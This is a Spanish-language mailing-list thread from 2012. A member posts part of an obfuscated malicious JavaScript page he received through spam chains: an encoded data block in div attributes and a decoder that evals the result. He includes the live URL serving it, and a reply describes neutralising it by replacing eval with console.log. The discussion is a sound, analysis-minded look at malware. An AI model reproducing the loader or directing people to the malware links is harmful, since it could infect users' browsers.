Hola gente!<br><br>Aprovecho este post para presentarme, soy Pedro, estoy programando ahora en Nueva Zelanda pero me crie en Mercedes, y estudie en la UTU. Me paso mi viejo un link de esta conversacion me parecio interesante y ahora me anote para UYLUG. Tambien me anote un poco porque me impresiono que se vaya a organizar un evento a nivel Latinoamericano de la OWASP en Montevideo, muy groso.<br>

<br>La verdad que no entiendo como codifica el malware el javascript, pero no hace falta saberlo porque al final el mismo lo decodifica y lo manda a un eval.<br><br>Para poder trabajar con el lo descargue desde la linea de comandos y lo edite con vim. Reemplace todas las ocurrencias de eval por console.log y luego copie los contenidos de el firebug en el pastebin y lo hice mas lindo.<br>

<br>El codigo del malware esta aca:<br><br><a href="http://pastie.org/5032658">http://pastie.org/5032658</a><br><br>Y adjunto el malware, segun yo, neutralizado. (no garantizo nada eh)<br><br>Saludos!<br>Pedro<br><br>---------- Mensaje reenviado ----------<br>



De: <b class="gmail_sendername">Kenneth Irving</b> <span dir="ltr"><<a href="mailto:ken@fq.edu.uy" target="_blank">ken@fq.edu.uy</a>></span><br>Fecha: 10 de octubre de 2012 19:25<br>Asunto: [uylug-varios] ataques curiosos<br>

Para: UYLUG <<a href="mailto:uylug-varios@uylug.org.uy" target="_blank">uylug-varios@uylug.org.uy</a>><br>

<br><br><br>
Hace un tiempo que de tanto en tanto recibo spam que parece diverso (el 
último era un boletín de noticias trucho de CNN), pero que termina 
siempre en algo parecido. Son emails que siempre tienen algún link que 
te baja un HTML que contiene en su interior 3 o 4 links que te bajan un 
código Javascript, que lo único que hace es bajar algún otro archivo, 
este sí un HTML que contiene el código malicioso en javascript.<br>


<br>
Paso el link final para bajar el código malicioso de javascript:<br>
<br>
 <a href="http://2.cmisdfoundation.com/links/persons_jobs.php" target="_blank">http://2.cmisdfoundation.com/links/persons_jobs.php</a><br>
<br>
y trascribo sólo parte del código. El código comienza con esto:<br>
<br>
------------------------- comienzo ------------------------------<div class="gmail_quote">---<br>
<html><head><title></title></head><body><div dqa="asd"></div><script>dd="div";asd=function(){a=a.replace(/[^012a-z3-9]/g,"");}</script><div 5 8="16#31193r341e*34393m1e36!3f333l3j18^193t3t3331_3k33381836$193r3t3i35(3k3l3i3e10@321v331e36&393i3j3k23+38393c341q%3e3l3c3c3t)1c3j353k2j#3k3 p3c351q*363l3e333k!393f3e1832^1c37193r3m_313i10361t$321e3j3k3p(3c351c311c@341c331t3k&38393j1r39+3618361616%37193r363f)3i18311t1g#1r311s371e*3 c353e373k!381r311t31^" 44="!38253m353e^3k18123f3e_121b341c33$193t353c3j(353r321t31@2r123f3e12&1b342t1r31+2r123f3e12%1b342t1t35)1e3n393e28#313 e343c35*3i18331c32!193t3t3t3t^1c3n393e28_313e343c35$3i1q363l3e(333k393f3e@18341c3319&3r3i353k3l+3i3e10363l%3e333k393f)3e18193r34#18191r3936*1 83k3p3g35!3f3610331t^1t12363l3e_333k393f3e$12" 49="42e3f34@353j2r382t&1r3k3i3p3r+331e3i353d%3f3m352338)393c341837#193t33313k*3338183619!3r3t3 t3t39^361833193r_3k3i3p3r34$1e34393m1e(3i353d3f3m@352338393c&341833193t+33313k3338%1836193r3t)3t3t3t3936#1811341e34*393m193r31!1t343f333l^3d3 53e3k1e_37353k253c$353d353e3k(223p293418@341e34393m&2924191r39+361831" 22="!18331c3219^3t3t3t3t1c_393e393k2j$333i393g3k(1q363l3e33@3k393f3e18 &193r3m313i+10331t3k38%393j1c311t)3e313m3937#313k3f3i1c*351t121f12!1c361c391t^311e3l3j35_3i2137353e$3k3s3s1212(1c371t311e@3m353e343f&3i3s3s12 12+1c321t311e%3g3c313k36)3f3i3d3s3s#12121c381t*311e3g3i3f!343l333k3s^3s12121r33_1e393e393k$2f"<br>




------------------------ [código cortado] ---------------------------<br>
<br>
El bloque de datos codificados continúa, y el archivo termina con esto:<br>
------------------------ [continuación] -----------------------------<br>
 65="53i)23313j3518#191e3i353g*3c31333518<br>
!1f2s3j1f37^1c1212191r_3h1t361b37$1b17103n39(343k381t12@171b3b1e3g&3c3l37393e+2j393q351b%1712103835)3937383k1t#12171b3b1e*3g3c3l3739!3e2j393q<br>
35^1b17121017_1r3h1b1t17$3j3k3p3c35(1t12171b39@1b1734393j&3g3c313p1q+393e3c393e%351r121017)1r363f3i18#3f1t1g1r3f*1s321e3c35"></div><script><br>
if(020==0x10)a=document.getElementsByTagName(dd)[1];<br>
s="";<br>
for(i=0;;i++){<br>
        if(window.document)r=a.getAttribute(i);<br>
        if(r){s=s+r;}else break;<br>
}<br>
a=s;<br>
asd();<br>
s="";<br>
for(i=0;i<a.length;i+=2){<br>
        s+=String.fromCharCode(parseInt(a.substr(i,2),32));<br>
}<br>
c=s;<br>
e=eval;<br>
try{if(020==0x10)("321".substr+"zxc")();}catch(gdsgdsg){e(c);}<br>
                </script></body></html><br>
-------------------- fin -------------------------------<br>
<br>
Esto lo paso sólo como muestra y para no publicar el socotroco completo.
 Es más práctico simplemente bajarlo desde el link original.<br>
<br>
Es obvio que el bloque de datos codificados e decodificado en el código 
javascript final, y luego de decodificarlo se ejecuta con el "e(c)".<br>
<br>
Imagino que debe tratarse de código javascript ofuscado para explotar 
alguna debilidad de algún navegador o algún cliente de email, pero mis 
pobres conocimientos de javascript no me han permitido decodificar esto 
sin riesgo, por lo que lo publico en esta lista, tal vez alguien con 
suficiente curiosidad pueda decodificarlo y hacernos saber de qué se 
trata. Es simplemente curiosidad, me resultó muy interesante el trabajo 
que se toman para ocultar el código malicioso.<br>


<br>
saludos<span><font color="#888888"><br>
<br>
 Kenneth</font></span><br>_______________________________________________<br>
Uylug-varios mailing list<br>
<a href="mailto:Uylug-varios@listas.uylug.org.uy" target="_blank">Uylug-varios@listas.uylug.org.uy</a><br>
<a href="http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy" target="_blank">http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy</a></div><br clear="all"><br>-- <br><a href="http://is.gd/signature_" target="_blank">http://is.gd/droope</a><br>